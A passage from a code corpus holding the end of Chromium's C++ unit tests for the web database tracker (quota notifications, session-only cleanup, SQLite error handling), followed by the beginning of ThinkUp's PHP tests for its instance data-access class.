tracker->GetFullDBFilePath(kOrigin1, kDB3), "aaaa", 4));
tracker->DatabaseModified(kOrigin1, kDB1);
CheckNotificationReceived(&observer1, kOrigin1, kDB1, 1);
CheckNotificationReceived(&observer2, kOrigin1, kDB1, 1);
tracker->DatabaseModified(kOrigin2, kDB2);
CheckNotificationReceived(&observer1, kOrigin2, kDB2, 2);
CheckNotificationReceived(&observer2, kOrigin2, kDB2, 2);
tracker->DatabaseModified(kOrigin1, kDB3);
CheckNotificationReceived(&observer1, kOrigin1, kDB3, 4);
CheckNotificationReceived(&observer2, kOrigin1, kDB3, 4);
// Close all databases
tracker->DatabaseClosed(kOrigin1, kDB1);
tracker->DatabaseClosed(kOrigin2, kDB2);
tracker->DatabaseClosed(kOrigin1, kDB3);
// Open an existing database and check the reported size
tracker->DatabaseOpened(kOrigin1, kDB1, kDescription, 0,
&database_size);
EXPECT_EQ(1, database_size);
tracker->DatabaseClosed(kOrigin1, kDB1);
// Remove an observer; this should clear all caches.
tracker->RemoveObserver(&observer2);
// Close the tracker database and clear all caches.
// Then make sure that DatabaseOpened() still returns the correct result.
tracker->CloseTrackerDatabaseAndClearCaches();
tracker->DatabaseOpened(kOrigin1, kDB1, kDescription, 0,
&database_size);
EXPECT_EQ(1, database_size);
tracker->DatabaseClosed(kOrigin1, kDB1);
// Remove all observers.
tracker->RemoveObserver(&observer1);
// Trying to delete a database in use should fail
tracker->DatabaseOpened(kOrigin1, kDB3, kDescription, 0,
&database_size);
EXPECT_FALSE(tracker->DeleteClosedDatabase(kOrigin1, kDB3));
origin1_info = tracker->GetCachedOriginInfo(kOrigin1);
EXPECT_TRUE(origin1_info);
EXPECT_EQ(4, origin1_info->GetDatabaseSize(kDB3));
tracker->DatabaseClosed(kOrigin1, kDB3);
// Delete a database and make sure the space used by that origin is updated
EXPECT_TRUE(tracker->DeleteClosedDatabase(kOrigin1, kDB3));
origin1_info = tracker->GetCachedOriginInfo(kOrigin1);
EXPECT_TRUE(origin1_info);
EXPECT_EQ(1, origin1_info->GetDatabaseSize(kDB1));
EXPECT_EQ(0, origin1_info->GetDatabaseSize(kDB3));
// Get all data for all origins
std::vector<OriginInfo> origins_info;
EXPECT_TRUE(tracker->GetAllOriginsInfo(&origins_info));
EXPECT_EQ(size_t(2), origins_info.size());
EXPECT_EQ(kOrigin1, origins_info[0].GetOriginIdentifier());
EXPECT_EQ(1, origins_info[0].TotalSize());
EXPECT_EQ(1, origins_info[0].GetDatabaseSize(kDB1));
EXPECT_EQ(0, origins_info[0].GetDatabaseSize(kDB3));
EXPECT_EQ(kOrigin2, origins_info[1].GetOriginIdentifier());
EXPECT_EQ(2, origins_info[1].TotalSize());
// Trying to delete an origin with databases in use should fail
tracker->DatabaseOpened(kOrigin1, kDB1, kDescription, 0,
&database_size);
EXPECT_FALSE(tracker->DeleteOrigin(kOrigin1, false));
origin1_info = tracker->GetCachedOriginInfo(kOrigin1);
EXPECT_TRUE(origin1_info);
EXPECT_EQ(1, origin1_info->GetDatabaseSize(kDB1));
tracker->DatabaseClosed(kOrigin1, kDB1);
// Delete an origin that doesn't have any database in use
EXPECT_TRUE(tracker->DeleteOrigin(kOrigin1, false));
origins_info.clear();
EXPECT_TRUE(tracker->GetAllOriginsInfo(&origins_info));
EXPECT_EQ(size_t(1), origins_info.size());
EXPECT_EQ(kOrigin2, origins_info[0].GetOriginIdentifier());
origin1_info = tracker->GetCachedOriginInfo(kOrigin1);
EXPECT_TRUE(origin1_info);
EXPECT_EQ(0, origin1_info->TotalSize());
}
static void DatabaseTrackerQuotaIntegration() {
const GURL kOrigin(kOrigin1Url);
const std::string kOriginId = storage::GetIdentifierFromOrigin(kOrigin);
const base::string16 kName = ASCIIToUTF16("name");
const base::string16 kDescription = ASCIIToUTF16("description");
base::ScopedTempDir temp_dir;
ASSERT_TRUE(temp_dir.CreateUniqueTempDir());
// Initialize the tracker with a QuotaManagerProxy
scoped_refptr<TestQuotaManagerProxy> test_quota_proxy(
new TestQuotaManagerProxy);
scoped_refptr<DatabaseTracker> tracker(
new DatabaseTracker(temp_dir.GetPath(), false /* incognito */, NULL,
test_quota_proxy.get(), NULL));
EXPECT_TRUE(test_quota_proxy->registered_client_);
// Create a database and modify it a couple of times, close it,
// then delete it. Observe the tracker notifies accordingly.
int64_t database_size = 0;
tracker->DatabaseOpened(kOriginId, kName, kDescription, 0,
&database_size);
EXPECT_TRUE(test_quota_proxy->WasAccessNotified(kOrigin));
test_quota_proxy->reset();
base::FilePath db_file(tracker->GetFullDBFilePath(kOriginId, kName));
EXPECT_TRUE(base::CreateDirectory(db_file.DirName()));
EXPECT_TRUE(EnsureFileOfSize(db_file, 10));
tracker->DatabaseModified(kOriginId, kName);
EXPECT_TRUE(test_quota_proxy->WasModificationNotified(kOrigin, 10));
test_quota_proxy->reset();
EXPECT_TRUE(EnsureFileOfSize(db_file, 100));
tracker->DatabaseModified(kOriginId, kName);
EXPECT_TRUE(test_quota_proxy->WasModificationNotified(kOrigin, 90));
test_quota_proxy->reset();
tracker->DatabaseClosed(kOriginId, kName);
EXPECT_TRUE(test_quota_proxy->WasAccessNotified(kOrigin));
EXPECT_EQ(net::OK, tracker->DeleteDatabase(
kOriginId, kName, net::CompletionCallback()));
EXPECT_TRUE(test_quota_proxy->WasModificationNotified(kOrigin, -100));
test_quota_proxy->reset();
// Create a database and modify it, try to delete it while open,
// then close it (at which time deletion will actually occur).
// Observe the tracker notifies accordingly.
tracker->DatabaseOpened(kOriginId, kName, kDescription, 0,
&database_size);
EXPECT_TRUE(test_quota_proxy->WasAccessNotified(kOrigin));
test_quota_proxy->reset();
db_file = tracker->GetFullDBFilePath(kOriginId, kName);
EXPECT_TRUE(base::CreateDirectory(db_file.DirName()));
EXPECT_TRUE(EnsureFileOfSize(db_file, 100));
tracker->DatabaseModified(kOriginId, kName);
EXPECT_TRUE(test_quota_proxy->WasModificationNotified(kOrigin, 100));
test_quota_proxy->reset();
EXPECT_EQ(net::ERR_IO_PENDING,
tracker->DeleteDatabase(kOriginId, kName,
net::CompletionCallback()));
EXPECT_FALSE(test_quota_proxy->WasModificationNotified(kOrigin, -100));
tracker->DatabaseClosed(kOriginId, kName);
EXPECT_TRUE(test_quota_proxy->WasAccessNotified(kOrigin));
EXPECT_TRUE(test_quota_proxy->WasModificationNotified(kOrigin, -100));
test_quota_proxy->reset();
// Create a database and up the file size without telling
// the tracker about the modification, than simulate a
// a renderer crash.
// Observe the tracker notifies accordingly.
tracker->DatabaseOpened(kOriginId, kName, kDescription, 0,
&database_size);
EXPECT_TRUE(test_quota_proxy->WasAccessNotified(kOrigin));
test_quota_proxy->reset();
db_file = tracker->GetFullDBFilePath(kOriginId, kName);
EXPECT_TRUE(base::CreateDirectory(db_file.DirName()));
EXPECT_TRUE(EnsureFileOfSize(db_file, 100));
DatabaseConnections crashed_renderer_connections;
crashed_renderer_connections.AddConnection(kOriginId, kName);
EXPECT_FALSE(test_quota_proxy->WasModificationNotified(kOrigin, 100));
tracker->CloseDatabases(crashed_renderer_connections);
EXPECT_TRUE(test_quota_proxy->WasModificationNotified(kOrigin, 100));
// Cleanup.
crashed_renderer_connections.RemoveAllConnections();
test_quota_proxy->SimulateQuotaManagerDestroyed();
}
static void DatabaseTrackerClearSessionOnlyDatabasesOnExit() {
int64_t database_size = 0;
const std::string kOrigin1 =
storage::GetIdentifierFromOrigin(GURL(kOrigin1Url));
const std::string kOrigin2 =
storage::GetIdentifierFromOrigin(GURL(kOrigin2Url));
const base::string16 kDB1 = ASCIIToUTF16("db1");
const base::string16 kDB2 = ASCIIToUTF16("db2");
const base::string16 kDescription = ASCIIToUTF16("database_description");
// Initialize the tracker database.
base::MessageLoop message_loop;
base::ScopedTempDir temp_dir;
ASSERT_TRUE(temp_dir.CreateUniqueTempDir());
base::FilePath origin1_db_dir;
base::FilePath origin2_db_dir;
{
scoped_refptr<MockSpecialStoragePolicy> special_storage_policy =
new MockSpecialStoragePolicy;
special_storage_policy->AddSessionOnly(GURL(kOrigin2Url));
scoped_refptr<DatabaseTracker> tracker(new DatabaseTracker(
temp_dir.GetPath(), false, special_storage_policy.get(), NULL,
base::ThreadTaskRunnerHandle::Get().get()));
// Open two new databases.
tracker->DatabaseOpened(kOrigin1, kDB1, kDescription, 0,
&database_size);
EXPECT_EQ(0, database_size);
tracker->DatabaseOpened(kOrigin2, kDB2, kDescription, 0,
&database_size);
EXPECT_EQ(0, database_size);
// Write some data to each file.
base::FilePath db_file;
db_file = tracker->GetFullDBFilePath(kOrigin1, kDB1);
EXPECT_TRUE(base::CreateDirectory(db_file.DirName()));
EXPECT_TRUE(EnsureFileOfSize(db_file, 1));
db_file = tracker->GetFullDBFilePath(kOrigin2, kDB2);
EXPECT_TRUE(base::CreateDirectory(db_file.DirName()));
EXPECT_TRUE(EnsureFileOfSize(db_file, 2));
// Store the origin database directories as long as they still exist.
origin1_db_dir = tracker->GetFullDBFilePath(kOrigin1, kDB1).DirName();
origin2_db_dir = tracker->GetFullDBFilePath(kOrigin2, kDB2).DirName();
tracker->DatabaseModified(kOrigin1, kDB1);
tracker->DatabaseModified(kOrigin2, kDB2);
// Close all databases.
tracker->DatabaseClosed(kOrigin1, kDB1);
tracker->DatabaseClosed(kOrigin2, kDB2);
tracker->Shutdown();
}
// At this point, the database tracker should be gone. Create a new one.
scoped_refptr<DatabaseTracker> tracker(
new DatabaseTracker(temp_dir.GetPath(), false, NULL, NULL, NULL));
// Get all data for all origins.
std::vector<OriginInfo> origins_info;
EXPECT_TRUE(tracker->GetAllOriginsInfo(&origins_info));
// kOrigin1 was not session-only, so it survived. kOrigin2 was session-only
// and it got deleted.
EXPECT_EQ(size_t(1), origins_info.size());
EXPECT_EQ(kOrigin1, origins_info[0].GetOriginIdentifier());
EXPECT_TRUE(
base::PathExists(tracker->GetFullDBFilePath(kOrigin1, kDB1)));
EXPECT_EQ(base::FilePath(), tracker->GetFullDBFilePath(kOrigin2, kDB2));
// The origin directory of kOrigin1 remains, but the origin directory of
// kOrigin2 is deleted.
EXPECT_TRUE(base::PathExists(origin1_db_dir));
EXPECT_FALSE(base::PathExists(origin2_db_dir));
}
static void DatabaseTrackerSetForceKeepSessionState() {
int64_t database_size = 0;
const std::string kOrigin1 =
storage::GetIdentifierFromOrigin(GURL(kOrigin1Url));
const std::string kOrigin2 =
storage::GetIdentifierFromOrigin(GURL(kOrigin2Url));
const base::string16 kDB1 = ASCIIToUTF16("db1");
const base::string16 kDB2 = ASCIIToUTF16("db2");
const base::string16 kDescription = ASCIIToUTF16("database_description");
// Initialize the tracker database.
base::MessageLoop message_loop;
base::ScopedTempDir temp_dir;
ASSERT_TRUE(temp_dir.CreateUniqueTempDir());
base::FilePath origin1_db_dir;
base::FilePath origin2_db_dir;
{
scoped_refptr<MockSpecialStoragePolicy> special_storage_policy =
new MockSpecialStoragePolicy;
special_storage_policy->AddSessionOnly(GURL(kOrigin2Url));
scoped_refptr<DatabaseTracker> tracker(new DatabaseTracker(
temp_dir.GetPath(), false, special_storage_policy.get(), NULL,
base::ThreadTaskRunnerHandle::Get().get()));
tracker->SetForceKeepSessionState();
// Open two new databases.
tracker->DatabaseOpened(kOrigin1, kDB1, kDescription, 0,
&database_size);
EXPECT_EQ(0, database_size);
tracker->DatabaseOpened(kOrigin2, kDB2, kDescription, 0,
&database_size);
EXPECT_EQ(0, database_size);
// Write some data to each file.
base::FilePath db_file;
db_file = tracker->GetFullDBFilePath(kOrigin1, kDB1);
EXPECT_TRUE(base::CreateDirectory(db_file.DirName()));
EXPECT_TRUE(EnsureFileOfSize(db_file, 1));
db_file = tracker->GetFullDBFilePath(kOrigin2, kDB2);
EXPECT_TRUE(base::CreateDirectory(db_file.DirName()));
EXPECT_TRUE(EnsureFileOfSize(db_file, 2));
// Store the origin database directories as long as they still exist.
origin1_db_dir = tracker->GetFullDBFilePath(kOrigin1, kDB1).DirName();
origin2_db_dir = tracker->GetFullDBFilePath(kOrigin2, kDB2).DirName();
tracker->DatabaseModified(kOrigin1, kDB1);
tracker->DatabaseModified(kOrigin2, kDB2);
// Close all databases.
tracker->DatabaseClosed(kOrigin1, kDB1);
tracker->DatabaseClosed(kOrigin2, kDB2);
tracker->Shutdown();
}
// At this point, the database tracker should be gone. Create a new one.
scoped_refptr<DatabaseTracker> tracker(
new DatabaseTracker(temp_dir.GetPath(), false, NULL, NULL, NULL));
// Get all data for all origins.
std::vector<OriginInfo> origins_info;
EXPECT_TRUE(tracker->GetAllOriginsInfo(&origins_info));
// No origins were deleted.
EXPECT_EQ(size_t(2), origins_info.size());
EXPECT_TRUE(
base::PathExists(tracker->GetFullDBFilePath(kOrigin1, kDB1)));
EXPECT_TRUE(
base::PathExists(tracker->GetFullDBFilePath(kOrigin2, kDB2)));
EXPECT_TRUE(base::PathExists(origin1_db_dir));
EXPECT_TRUE(base::PathExists(origin2_db_dir));
}
static void EmptyDatabaseNameIsValid() {
const GURL kOrigin(kOrigin1Url);
const std::string kOriginId = storage::GetIdentifierFromOrigin(kOrigin);
const base::string16 kEmptyName;
const base::string16 kDescription(ASCIIToUTF16("description"));
const base::string16 kChangedDescription(
ASCIIToUTF16("changed_description"));
// Initialize a tracker database, no need to put it on disk.
const bool kUseInMemoryTrackerDatabase = true;
base::ScopedTempDir temp_dir;
ASSERT_TRUE(temp_dir.CreateUniqueTempDir());
scoped_refptr<DatabaseTracker> tracker(new DatabaseTracker(
temp_dir.GetPath(), kUseInMemoryTrackerDatabase, NULL, NULL, NULL));
// Starts off with no databases.
std::vector<OriginInfo> infos;
EXPECT_TRUE(tracker->GetAllOriginsInfo(&infos));
EXPECT_TRUE(infos.empty());
// Create a db with an empty name.
int64_t database_size = -1;
tracker->DatabaseOpened(kOriginId, kEmptyName, kDescription, 0,
&database_size);
EXPECT_EQ(0, database_size);
tracker->DatabaseModified(kOriginId, kEmptyName);
EXPECT_TRUE(tracker->GetAllOriginsInfo(&infos));
EXPECT_EQ(1u, infos.size());
EXPECT_EQ(kDescription, infos[0].GetDatabaseDescription(kEmptyName));
EXPECT_FALSE(tracker->GetFullDBFilePath(kOriginId, kEmptyName).empty());
tracker->DatabaseOpened(kOriginId, kEmptyName, kChangedDescription, 0,
&database_size);
infos.clear();
EXPECT_TRUE(tracker->GetAllOriginsInfo(&infos));
EXPECT_EQ(1u, infos.size());
EXPECT_EQ(kChangedDescription, infos[0].GetDatabaseDescription(kEmptyName));
tracker->DatabaseClosed(kOriginId, kEmptyName);
tracker->DatabaseClosed(kOriginId, kEmptyName);
// Deleting it should return to the initial state.
EXPECT_EQ(net::OK, tracker->DeleteDatabase(kOriginId, kEmptyName,
net::CompletionCallback()));
infos.clear();
EXPECT_TRUE(tracker->GetAllOriginsInfo(&infos));
EXPECT_TRUE(infos.empty());
}
static void HandleSqliteError() {
const GURL kOrigin(kOrigin1Url);
const std::string kOriginId = storage::GetIdentifierFromOrigin(kOrigin);
const base::string16 kName(ASCIIToUTF16("name"));
const base::string16 kDescription(ASCIIToUTF16("description"));
// Initialize a tracker database, no need to put it on disk.
const bool kUseInMemoryTrackerDatabase = true;
base::ScopedTempDir temp_dir;
ASSERT_TRUE(temp_dir.CreateUniqueTempDir());
scoped_refptr<DatabaseTracker> tracker(new DatabaseTracker(
temp_dir.GetPath(), kUseInMemoryTrackerDatabase, NULL, NULL, NULL));
// Setup to observe OnScheduledForDelete notifications.
TestObserver observer(false, true);
tracker->AddObserver(&observer);
// Verify does no harm when there is no such database.
tracker->HandleSqliteError(kOriginId, kName, SQLITE_CORRUPT);
EXPECT_FALSE(tracker->IsDatabaseScheduledForDeletion(kOriginId, kName));
EXPECT_FALSE(observer.DidReceiveNewNotification());
// --------------------------------------------------------
// Create a record of a database in the tracker db and create
// a spoof_db_file on disk in the expected location.
int64_t database_size = 0;
tracker->DatabaseOpened(kOriginId, kName, kDescription, 0,
&database_size);
base::FilePath spoof_db_file = tracker->GetFullDBFilePath(kOriginId, kName);
EXPECT_FALSE(tracker->GetFullDBFilePath(kOriginId, kName).empty());
EXPECT_TRUE(base::CreateDirectory(spoof_db_file.DirName()));
EXPECT_TRUE(EnsureFileOfSize(spoof_db_file, 1));
// Verify does no harm with a non-error is reported.
tracker->HandleSqliteError(kOriginId, kName, SQLITE_OK);
EXPECT_FALSE(tracker->IsDatabaseScheduledForDeletion(kOriginId, kName));
EXPECT_FALSE(observer.DidReceiveNewNotification());
// Verify that with a connection open, the db is scheduled for deletion,
// but that the file still exists.
tracker->HandleSqliteError(kOriginId, kName, SQLITE_CORRUPT);
EXPECT_TRUE(tracker->IsDatabaseScheduledForDeletion(kOriginId, kName));
EXPECT_TRUE(observer.DidReceiveNewNotification());
EXPECT_TRUE(base::PathExists(spoof_db_file));
// Verify that once closed, the file is deleted and the record in the
// tracker db is removed.
tracker->DatabaseClosed(kOriginId, kName);
EXPECT_FALSE(base::PathExists(spoof_db_file));
EXPECT_TRUE(tracker->GetFullDBFilePath(kOriginId, kName).empty());
// --------------------------------------------------------
// Create another record of a database in the tracker db and create
// a spoof_db_file on disk in the expected location.
tracker->DatabaseOpened(kOriginId, kName, kDescription, 0,
&database_size);
base::FilePath spoof_db_file2 = tracker->GetFullDBFilePath(kOriginId,
kName);
EXPECT_FALSE(tracker->GetFullDBFilePath(kOriginId, kName).empty());
EXPECT_NE(spoof_db_file, spoof_db_file2);
EXPECT_TRUE(base::CreateDirectory(spoof_db_file2.DirName()));
EXPECT_TRUE(EnsureFileOfSize(spoof_db_file2, 1));
// Verify that with no connection open, the db is deleted immediately.
tracker->DatabaseClosed(kOriginId, kName);
tracker->HandleSqliteError(kOriginId, kName, SQLITE_CORRUPT);
EXPECT_FALSE(tracker->IsDatabaseScheduledForDeletion(kOriginId, kName));
EXPECT_FALSE(observer.DidReceiveNewNotification());
EXPECT_TRUE(tracker->GetFullDBFilePath(kOriginId, kName).empty());
EXPECT_FALSE(base::PathExists(spoof_db_file2));
tracker->RemoveObserver(&observer);
}
};
TEST(DatabaseTrackerTest, DeleteOpenDatabase) {
DatabaseTracker_TestHelper_Test::TestDeleteOpenDatabase(false);
}
TEST(DatabaseTrackerTest, DeleteOpenDatabaseIncognitoMode) {
DatabaseTracker_TestHelper_Test::TestDeleteOpenDatabase(true);
}
TEST(DatabaseTrackerTest, DatabaseTracker) {
DatabaseTracker_TestHelper_Test::TestDatabaseTracker(false);
}
TEST(DatabaseTrackerTest, DatabaseTrackerIncognitoMode) {
DatabaseTracker_TestHelper_Test::TestDatabaseTracker(true);
}
TEST(DatabaseTrackerTest, DatabaseTrackerQuotaIntegration) {
// There is no difference in behavior between incognito and not.
DatabaseTracker_TestHelper_Test::DatabaseTrackerQuotaIntegration();
}
TEST(DatabaseTrackerTest, DatabaseTrackerClearSessionOnlyDatabasesOnExit) {
// Only works for regular mode.
DatabaseTracker_TestHelper_Test::
DatabaseTrackerClearSessionOnlyDatabasesOnExit();
}
TEST(DatabaseTrackerTest, DatabaseTrackerSetForceKeepSessionState) {
// Only works for regular mode.
DatabaseTracker_TestHelper_Test::DatabaseTrackerSetForceKeepSessionState();
}
TEST(DatabaseTrackerTest, EmptyDatabaseNameIsValid) {
DatabaseTracker_TestHelper_Test::EmptyDatabaseNameIsValid();
}
TEST(DatabaseTrackerTest, HandleSqliteError) {
DatabaseTracker_TestHelper_Test::HandleSqliteError();
}
} // namespace content
| geminy/aidear | oss/qt/qt-everywhere-opensource-src-5.9.0/qtwebengine/src/3rdparty/chromium/content/browser/database_tracker_unittest.cc | C++ | gpl-3.0 | 35,365 |
<?php
/**
*
* ThinkUp/tests/TestOfInstanceMySQLDAO.php
*
* Copyright (c) 2009-2015 Gina Trapani, Guillaume Boudreau, Christoffer Viken, Mark Wilkie
*
* LICENSE:
*
* This file is part of ThinkUp (http://thinkup.com).
*
* ThinkUp is free software: you can redistribute it and/or modify it under the terms of the GNU General Public
* License as published by the Free Software Foundation, either version 2 of the License, or (at your option) any
* later version.
*
* ThinkUp is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
* warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
* details.
*
* You should have received a copy of the GNU General Public License along with ThinkUp. If not, see
* <http://www.gnu.org/licenses/>.
*
*
* @author Gina Trapani <ginatrapani[at]gmail[dot]com>
* @author Guillaume Boudreau <gboudreau[at]pommepause[dot]com>
* @author Christoffer Viken <christoffer[at]viken[dot]me>
* @author Mark Wilkie <mark[at]bitterpill[dot]org>
* @license http://www.gnu.org/licenses/gpl.html
* @copyright 2009-2015 Gina Trapani, Guillaume Boudreau, Christoffer Viken, Mark Wilkie
*/
require_once dirname(__FILE__).'/init.tests.php';
require_once THINKUP_WEBAPP_PATH.'_lib/extlib/simpletest/autorun.php';
require_once THINKUP_WEBAPP_PATH.'config.inc.php';
class TestOfInstanceMySQLDAO extends ThinkUpUnitTestCase {
protected $DAO;
public function setUp() {
parent::setUp();
$this->DAO = new InstanceMySQLDAO();
$this->builders = $this->buildData();
}
protected function buildData() {
$builders = array();
$builders[] = FixtureBuilder::build('instances', array('network_user_id'=>10, 'network_username'=>'jack',
'network'=>'twitter', 'network_viewer_id'=>10, 'crawler_last_run'=>'1988-01-20 12:00:00', 'is_active'=>1,
'is_public'=>0, 'posts_per_day'=>11, 'posts_per_week'=>77));
$builders[] = FixtureBuilder::build('instances', array('network_user_id'=>12, 'network_username'=>'jill',
'network'=>'twitter', 'network_viewer_id'=>12, 'crawler_last_run'=>'2010-01-20 12:00:00', 'is_active'=>1,
'is_public'=>0, 'posts_per_day'=>11, 'posts_per_week'=>77));
$builders[] = FixtureBuilder::build('instances', array('network_user_id'=>13, 'network_username'=>'stuart',
'network'=>'twitter', 'network_viewer_id'=>13, 'crawler_last_run'=>'2010-01-01 12:00:00', 'is_active'=>0,
'is_public'=>1, 'posts_per_day'=>11, 'posts_per_week'=>77));
$builders[] = FixtureBuilder::build('instances', array('network_user_id'=>15,
'network_username'=>'Jillian Dickerson', 'network'=>'facebook', 'network_viewer_id'=>15,
'crawler_last_run'=>'2010-01-01 12:00:01', 'is_active'=>1, 'is_public'=>1, 'posts_per_day'=>11,
'posts_per_week'=>77));
$builders[] = FixtureBuilder::build('instances', array('network_user_id'=>16, 'network_username'=>'Paul Clark',
'network'=>'facebook', 'network_viewer_id'=>16, 'crawler_last_run'=>'2010-01-01 12:00:02', 'is_active'=>0,
'is_public'=>1, 'posts_per_day'=>11, 'posts_per_week'=>77));
$builders[] = FixtureBuilder::build('owner_instances', array('owner_id'=>2, 'instance_id'=>1,
'auth_error'=>"There has been an error."));
$builders[] = FixtureBuilder::build('owner_instances', array('owner_id'=>2, 'instance_id'=>2,
'auth_error'=>''));
return $builders;
}
public function tearDown() {
$this->builders = null;
parent::tearDown();
}
public function testDeleteInstance() {
$i = $this->DAO->getByUsernameOnNetwork('jack', 'twitter');
$this->assertNotNull($i);
$result = $this->DAO->delete('jack', 'twitter');
$this->assertEqual($result, 1);
$i = $this->DAO->getByUsernameOnNetwork('jack', 'twitter');
$this->assertNull($i);
$result = $this->DAO->delete('idontexist', 'somenonexistentnetwork');
$this->assertEqual($result, 0);
}
public function testGet() {
$i = $this->DAO->get(1);
$this->assertIsA($i, 'Instance');
$this->assertEqual($i->id, 1);
$this->assertEqual($i->network_user_id, 10);
$this->assertEqual($i->network_username, 'jack');
$this->assertEqual($i->network, 'twitter');
$i = $this->DAO->get(100);
$this->assertNull($i);
}
public function testGetHoursSinceLastCrawlerRun() {
$dao = new InstanceMySQLDAO();
//set all existing instances to inactive first
$dao->setActive(1, 0);
$dao->setActive(2, 0);
$dao->setActive(3, 0);
$dao->setActive(4, 0);
$dao->setActive(5, 0);
$builders[] = FixtureBuilder::build('instances', array('crawler_last_run'=>'-3h', 'is_active'=>1));
$hours = $dao->getHoursSinceLastCrawlerRun();
$this->assertEqual($hours, 3);
$builders[] = FixtureBuilder::build('instances', array('crawler_last_run'=>'-2h', 'is_active'=>1));
$hours = $dao->getHoursSinceLastCrawlerRun();
$this->assertEqual($hours, 3);
// test that it ignores inactive instances
$builders[] = FixtureBuilder::build('instances', array('crawler_last_run'=>'-1h', 'is_active' => 0));
$hours = $dao->getHoursSinceLastCrawlerRun();
$this->assertEqual($hours, 3);
}
public function testInsert() {
$result = $this->DAO->insert(11, 'ev');
$this->assertEqual($result, 6);
$i = $this->DAO->getByUserIdOnNetwork(11, 'twitter');
$this->assertEqual($i->network_user_id, 11);
$this->assertEqual($i->network_viewer_id, 11);
$this->assertEqual($i->network_username, 'ev');
$this->assertEqual($i->network, 'twitter');
$result = $this->DAO->insert(14, 'The White House Facebook Page', 'facebook', 10);
$this->assertEqual($result, 7);
$i = $this->DAO->getByUserIdOnNetwork(14, 'facebook');
$this->assertEqual($i->network_user_id, 14);
$this->assertEqual($i->network_viewer_id, 10);
$this->assertEqual($i->network_username, 'The White House Facebook Page');
$this->assertEqual($i->network, 'facebook');
}
public function testGetFreshestByOwnerId(){
$instance_builder = FixtureBuilder::build('instances', array('network_username'=>'julie',
'network'=>'twitter', 'crawler_last_run'=>'-1d', 'is_activated'=>'1', 'is_public'=>'1'));
$owner_instance_builder = FixtureBuilder::build('owner_instances', array(
'instance_id'=>$instance_builder->columns['last_insert_id'], 'owner_id'=>'2'));
//try one
$instance = $this->DAO->getFreshestByOwnerId(2);
$this->assertIsA($instance, "Instance");
$this->assertEqual($instance->id, $instance_builder->columns['last_insert_id']);
$this->assertEqual($instance->network_username, 'julie');
$this->assertEqual($instance->network_user_id, $instance_builder->columns['network_user_id']);
$this->assertEqual($instance->network_viewer_id, $instance_builder->columns['network_viewer_id']);
//Try a non existent one
$result = $this->DAO->getFreshestByOwnerId(3);
$this->assertNull($result);
}
public function testGetInstanceOneByLastRun(){
//Try Newest
$result = $this->DAO->getInstanceFreshestOne();
$this->assertIsA($result, "Instance");
$this->assertEqual($result->network_username, 'jill');
$this->assertEqual($result->network_user_id, 12);
$this->assertEqual($result->network_viewer_id, 12);
//Try Newest Public
$result = $this->DAO->getInstanceFreshestPublicOne();
$this->assertIsA($result, "Instance");
$this->assertEqual($result->network_username, 'Paul Clark');
$this->assertEqual($result->network_user_id, 16);
$this->assertEqual($result->network_viewer_id, 16);
//Try Oldest
$result = $this->DAO->getInstanceStalestOne();
$this->assertIsA($result, "Instance");
$this->assertEqual($result->network_username, 'jack');
$this->assertEqual($result->network_user_id, 10);
$this->assertEqual($result->network_viewer_id, 10);
$config = Config::getInstance();
$config_array = $config->getValuesArray();
$q = "TRUNCATE TABLE " . $config_array['table_prefix'] . "instances ";
PDODAO::$PDO->exec($q);
//Try empty
$result = $this->DAO->getInstanceStalestOne();
$this->assertNull($result);
}
public function testGetByUsername() {
//try one user
$result = $this->DAO->getByUsername('jill');
$this->assertIsA($result, "Instance");
$this->assertEqual($result->network_username, 'jill');
$this->assertEqual($result->network_user_id, 12);
$this->assertEqual($result->network_viewer_id, 12);
//try another one
$result = $this->DAO->getByUsername('jack');
$this->assertIsA($result, "Instance");
$this->assertEqual($result->network_username, 'jack');
$this->assertEqual($result->network_user_id, 10);
$this->assertEqual($result->network_viewer_id, 10);
//try non-existing one
$result = $this->DAO->getByUsername('no one');
$this->assertNull($result);
}
public function testGetByUserId() {
// data do exist
$result = $this->DAO->getByUserIdOnNetwork(10, 'twitter');
$this->assertIsA($result, "Instance");
$this->assertEqual($result->network_username, 'jack');
$this->assertEqual($result->network_user_id, 10);
$this->assertEqual($result->network_viewer_id, 10);
// data do not exist
$result = $this->DAO->getByUserIdOnNetwork(11, 'twitter');
$this->assertNull($result);
}
public function testGetAllInstances(){
//getAllInstances($order = "DESC", $only_active = false, $network = "twitter")
// Test, default settings
$result = $this->DAO->getAllInstances();
$this->assertIsA($result, "array");
$this->assertEqual(count($result), 3);
$users = array('jill','stuart','jack');
$uID = array(12,13,10);
$vID = array(12,13,10);
foreach($result as $id=>$i){
$this->assertIsA($i, "Instance");
$this->assertEqual($i->network_username, $users[$id]);
$this->assertEqual($i->network_user_id, $uID[$id]);
$this->assertEqual($i->network_viewer_id, $vID[$id]);
}
// Test ASC
$result = $this->DAO->getAllInstances("ASC");
$this->assertIsA($result, "array");
$this->assertEqual(count($result), 3);
$users = array('jack','stuart','jill');
$uID = array(10,13,12);
$vID = array(10,13,12);
foreach($result as $id=>$i){
$this->assertIsA($i, "Instance");
$this->assertEqual($i->network_username, $users[$id]);
$this->assertEqual($i->network_user_id, $uID[$id]);
$this->assertEqual($i->network_viewer_id, $vID[$id]);
}
// Test ASC Only Active
$result = $this->DAO->getAllInstances("ASC", true);
$this->assertIsA($result, "array");
$this->assertEqual(count($result), 2);
$users = array('jack','jill');
$uID = array(10,12);
$vID = array(10,12);
foreach($result as $id=>$i){
$this->assertIsA($i, "Instance");
$this->assertEqual($i->network_username, $users[$id]);
$this->assertEqual($i->network_user_id, $uID[$id]);
$this->assertEqual($i->network_viewer_id, $vID[$id]);
}
// Test ASC Facebook
$result = $this->DAO->getAllInstances("ASC", false, 'facebook');
$this->assertIsA($result, "array");
$this->assertEqual(count($result), 2);
$users = array('Jillian Dickerson','Paul Clark');
$uID = array(15,16);
$vID = array(15,16);
foreach($result as $id=>$i){
$this->assertIsA($i, "Instance");
$this->assertEqual($i->network_username, $users[$id]);
$this->assertEqual($i->network_user_id, $uID[$id]);
$this->assertEqual($i->network_viewer_id, $vID[$id]);
}
// Test ASC only active Facebook
$result = $this->DAO->getAllInstances("ASC", true, 'facebook');
$this->assertIsA($result, "array");
$this->assertEqual(count($result), 1);
$users = array('Jillian Dickerson');
$uID = array(15);
$vID = array(15);
foreach($result as $id=>$i){
$this->assertIsA($i, "Instance");
$this->assertEqual($i->network_username, $users[$id]);
